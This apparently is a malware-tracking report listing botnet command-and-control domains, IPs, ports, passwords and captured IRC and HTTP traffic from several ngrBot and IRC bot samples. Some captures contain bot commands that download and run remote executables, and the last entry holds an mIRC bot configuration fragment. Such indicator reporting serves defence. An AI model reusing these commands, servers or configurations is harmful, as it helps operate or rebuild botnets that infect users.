File Details
MD5: 55c55f7764767fd46909b95b1e64b2d1
SHA-1: 964d2183f263be8bc565d3dd307486614e5d6ce1
File Type: exe
First Received (GMT+8): 2012-02-18 06:49:00
Size (bytes): 8704
Weightage: 147
virustotal.com: 29 vendors detected
Static File Header
++++++++++++++++++++++++ FILE HEADER INFORMATION +++++++++++++++++++++++++
TimeStamp: 4F1DB86E Tue Jan 24 03:43:42 2012
Subsystem: 2 (Windows GUI)
Image Base: 00400000 Size: 00006000
Code Base: 00001000 Size: 00001600
Data Base: 00003000 ...
foxbid.net(irc botnet hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)
Remote Host Port Number
122.155.18.83 2345
NICK New[USA|00|P|79102]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-4584 * 0 :COMPUTERNAME
MODE New[USA|00|P|79102] -ix
JOIN #!loco!
PONG 22 MOTD
Now talking in #!loco!
Topic On: [ #!loco! ] [ .m.s|.m.e haha foto 😛 http://goo.gl/W2EOO?= ]
Topic By: [ wd44...
webingenial.com(ngrBot hosted in Ukraine Tehnologii Budushego Llc)
Resolved : [webingenial.com] To [178.86.30.169] port 1865
Resolved : [webingenial.com] To [213.155.7.39] port 1865
Remote Host Port Number
178.86.30.169 1865 PASS ngrBot
213.155.7.39 1865 PASS ngrBot
NICK n{US|XPa}rwslldg
USER rwslldg 0 0 :rwslldg
Now talking in #main
Topic On: [ #main ] [ .m on .up http://www.creatucurso.net/ups.exe 5A551736BBC5CA8245CAB24FA0DD18BC -r ]
Topic By: [ fckoffoOo ] ...
jer0001.in(ngrBot hosted in United States Razor Inc)
Very big botnet. Already posted different domain names from this net here.
Resolved : [jer0001.in] To [208.83.233.194] port 1889
Resolved : [jer0001.in] To [208.83.232.90] port 1889
Resolved : [jer0001.in] To [208.83.234.66] port 1889
HTTP Conversations:
199.15.234.7:80 – [api.wipmania.com] Request: GET / Response: 200 “OK”
199.7.177.218:80 – [hotfile.com] Request: GET /dl/146860590/6c4cc0b/sgfdfa.exe Response: 302 “Found”
74.120.11.30:80 – ...
zaber.zaberhmar.com(Malware hosted in Netherlands Amsterdam Worldstream)
Resolved : [zaber.zaberhmar.com] To [109.236.86.227]
Resolved : [zaber.zaberhmar.com] To [80.79.115.30]
Resolved : [zaber.zaberhmar.com] To [109.236.80.114]
Resolved : [zaber.zaberhmar.com] To [217.23.9.116]
Resolved : [zaber.zaberhmar.com] To [94.102.56.158]
Resolved : [zaber.zaberhmar.com] To [50.7.241.242]
Resolved : [zaber.zaberhmar.com] To [80.82.64.69]
Resolved : [zaber.zaberhmar.com] To [217.23.1.100]
Resolved : [zaber.zaberhmar.com] To [217.23.7.147]
TCP Connection Attempts:
109.236.80.114:8800
80.79.115.30:8800
109.236.86.227:8800
217.23.9.116:8800
94.102.56.158:8800
50.7.241.242:8800
Malware ...
sec.ka3ek2.com(Malware hosted in United Kingdom Petersburg Internet Network Ltd)
This malware spreads through email and exe infection, injects into explorer.exe, downloads other malware and is controlled through HTTP.
sec.ka3ek2.com DNS_TYPE_A 31.44.184.232
Infected SMTP servers used by this malware for spamming:
Resolved : [mx3.hotmail.com] To [65.54.188.72]
Resolved : [mx3.hotmail.com] To [65.54.188.94]
Resolved : [mx3.hotmail.com] To [65.55.92.152]
Resolved : [mx3.hotmail.com] To [65.55.37.120]
Resolved : [mx3.hotmail.com] To [65.55.37.104]
Resolved : [mx3.hotmail.com] ...
67.222.146.210(ngrBot hosted in United States Dfw Datacenter)
Remote Host Port Number
199.15.234.7 80
67.222.146.210 6060 PASS saher
NICK n{US|XPa}exohsgb
USER exohsgb 0 0 :exohsgb
JOIN #ksa ksa1
hosting infos: http://whois.domaintools.com/67.222.146.210
mooo.com(ngrBot hosted in Ukraine Poltava Tehnologii Budushego Llc)
Domain names used to control the botnet:
hdp.zapto.org 46.166.141.149 active
1n1.sytes.net 213.155.7.39 active
hdp.zapto.org not active
hgjma1.biz not active
jma1.biz not active
mooo.com 72.8.150.1 active
n1.mooo.com 86.35.19.116 active
fhdp.zapto.org
Remote Host Port Number
199.15.234.7 80
50.22.107.93 80
213.155.7.39 2009 PASS ngr
NICK n{US|XPa}dcbcoox
USER dcbcoox 0 0 :dcbcoox
JOIN #juaz ngrBot
PRIVMSG #juaz :[d=”http://creatucurso.net/facu/mx.exe” s=”198683...
216.246.78.247(irc bot hosted in United States New York Hostforweb Inc)
Remote Host Port Number
216.246.78.247 2345
NICK New[USA|00|P|75060]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-9002 * 0 :COMPUTERNAME
MODE New[USA|00|P|75060] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos: http://whois.domaintools.com/216.246.78.247
tool.manitam.com(mIRC bots hosted in United Kingdom Redstation Limited)
tool.manitam.com 176.227.199.27
dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
Opened listening TCP connection on port: 113
C&C Server: 176.227.199.27:6669
Server Password:
Username: m0x
Nickname: [x0x]XP92288
Channel: #d0x (Password: )
Channeltopic:
Bot Config:
On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMirc...